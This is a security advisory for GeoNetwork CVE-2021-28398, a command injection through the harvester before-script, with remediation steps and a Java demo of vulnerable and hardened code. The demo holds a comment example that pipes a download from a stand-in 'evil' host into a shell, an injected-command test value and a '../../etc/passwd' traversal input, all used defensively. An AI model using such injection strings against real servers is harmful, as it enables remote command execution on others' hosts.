PT-2022-9890 · Unknown · Geonetwork

Tyler Sullivan · Published 2022-09-05 · Updated 2022-10-01

CVE-2021-28398

CVSS v3.1: 7.2 (High)
Vector: AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Name of the Vulnerable Software and Affected Versions: GeoNetwork 3.4.0 up to, but not including, 3.12.0; GeoNetwork 4.0.0 through 4.0.3.

Description: A privileged attacker can use the directory (local filesystem) harvester before-script to execute arbitrary OS commands remotely on the hosting infrastructure. The before-script is a string entered in the harvester configuration; when the harvest runs, the server executes that string on the host, so any command placed in the field runs with the privileges of the GeoNetwork server process. Exploitation requires a User Administrator or Administrator account, which is why the vector carries PR:H; the remaining metrics (network reachable, low complexity, no user interaction, full loss of confidentiality, integrity and availability) reflect a complete host compromise once that account is held. The issue occurs in the runBeforeScript method in harvesters/src/main/java/org/fao/geonet/kernel/harvest/harvester/localfilesystem/LocalFilesystemHarvester.java.

Recommendations: For GeoNetwork 3.x releases earlier than 3.12.0, update to version 3.12.0 or later. For GeoNetwork 4.0.0 through 4.0.3, update to version 4.0.4 or later. Where an immediate upgrade is not possible, disable the runBeforeScript method in the LocalFilesystemHarvester class (so that a configured before-script is never executed) until the patch can be applied. Because the attack requires a User Administrator or Administrator account, also keep those roles limited to trusted staff, and review existing local filesystem harvester configurations for before-script values that do not point at a known, operator-maintained script.
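As an added illustration for this advisory (written for this page; it is not GeoNetwork's code and is not the project's actual patch), the Java program below reproduces the shape of the flaw described above, a configured before-script string handed verbatim to a shell, next to one hardened design: the configured value is treated as a bare file name under an operator-controlled directory, checked after symlink resolution, and executed without a shell. The method names, the script directory and the sample attacker value are assumptions made for the demo, and it needs a POSIX system with /bin/sh.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.concurrent.TimeUnit;

/*
 * Illustrative demo for CVE-2021-28398; NOT GeoNetwork's code.
 * Shows a before-script string reaching the OS unchecked (the flaw)
 * and one hardened alternative (hypothetical design, not the project's fix).
 */
public class BeforeScriptDemo {

    /** Vulnerable shape: the configured string reaches a shell verbatim. */
    static int runBeforeScriptVulnerable(String configuredScript)
            throws IOException, InterruptedException {
        // Whatever the harvester form contains runs as the server process,
        // so "prep.sh; curl http://evil/x | sh" is remote command execution.
        ProcessBuilder pb = new ProcessBuilder("/bin/sh", "-c", configuredScript);
        pb.inheritIO();
        return pb.start().waitFor();
    }

    /**
     * Hardened shape: the value is a plain file name under an operator-owned
     * directory, verified after symlink resolution, run without a shell.
     */
    static int runBeforeScriptHardened(Path scriptDir, String configuredName)
            throws IOException, InterruptedException {
        // Plain file names only: no path separators, no shell metacharacters.
        if (!configuredName.matches("[A-Za-z0-9_][A-Za-z0-9_.-]*")) {
            throw new IllegalArgumentException("before-script must be a plain file name");
        }
        Path base = scriptDir.toRealPath();
        Path candidate = base.resolve(configuredName);
        if (!Files.isRegularFile(candidate)) {
            throw new SecurityException("no such before-script under " + base);
        }
        // toRealPath() follows symlinks, so a link that points outside the
        // directory fails the startsWith check below.
        Path script = candidate.toRealPath();
        if (!script.startsWith(base)) {
            throw new SecurityException("before-script escapes " + base);
        }
        // argv[0] only, no "/bin/sh -c": nothing in the value is parsed as shell.
        Process p = new ProcessBuilder(script.toString()).inheritIO().start();
        if (!p.waitFor(60, TimeUnit.SECONDS)) {
            p.destroyForcibly();
            throw new IOException("before-script timed out");
        }
        return p.exitValue();
    }

    public static void main(String[] args) throws Exception {
        // Constructed fixture: an operator-owned script directory with one script.
        Path dir = Files.createTempDirectory("gn-before-scripts");
        Path prep = dir.resolve("prep.sh");
        Files.write(prep, "#!/bin/sh\necho \"[prep.sh] legitimate before-script ran\"\n".getBytes());
        prep.toFile().setExecutable(true);

        // Constructed attacker value: a plausible script path followed by an
        // injected command. The injected part is harmless so the demo is safe to run.
        String attackerValue = prep + "; echo \"[INJECTED] running as uid $(id -u)\"";

        // Vulnerable path: both the script and the injected command execute.
        System.out.println("vulnerable: exit=" + runBeforeScriptVulnerable(attackerValue));

        // Hardened path: injection and traversal are rejected before anything runs.
        try {
            runBeforeScriptHardened(dir, attackerValue);
        } catch (IllegalArgumentException e) {
            System.out.println("hardened rejected injection: " + e.getMessage());
        }
        try {
            runBeforeScriptHardened(dir, "../../etc/passwd");
        } catch (IllegalArgumentException e) {
            System.out.println("hardened rejected traversal: " + e.getMessage());
        }
        // Only the allow-listed script runs, with no shell in the chain.
        System.out.println("hardened: exit=" + runBeforeScriptHardened(dir, "prep.sh"));
    }
}
```

Compile and run with `javac BeforeScriptDemo.java && java BeforeScriptDemo`. The point of the hardened variant is that the web-facing field no longer carries a command line at all, only a name resolved against a directory the attacker cannot write to; if the temporary directory on the host is mounted noexec, move the fixture to a writable, executable location. The page's own short-term workaround, disabling runBeforeScript entirely, remains the simpler option when the feature is not needed.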

Fix: upgrade to GeoNetwork 3.12.0 (3.x) or 4.0.4 (4.0.x); see Recommendations.

Weakness Enumeration: OS Command Injection (CWE-78)

Related Identifiers: CVE-2021-28398, GHSA-CF8P-C88C-H9JF

Affected Products: GeoNetwork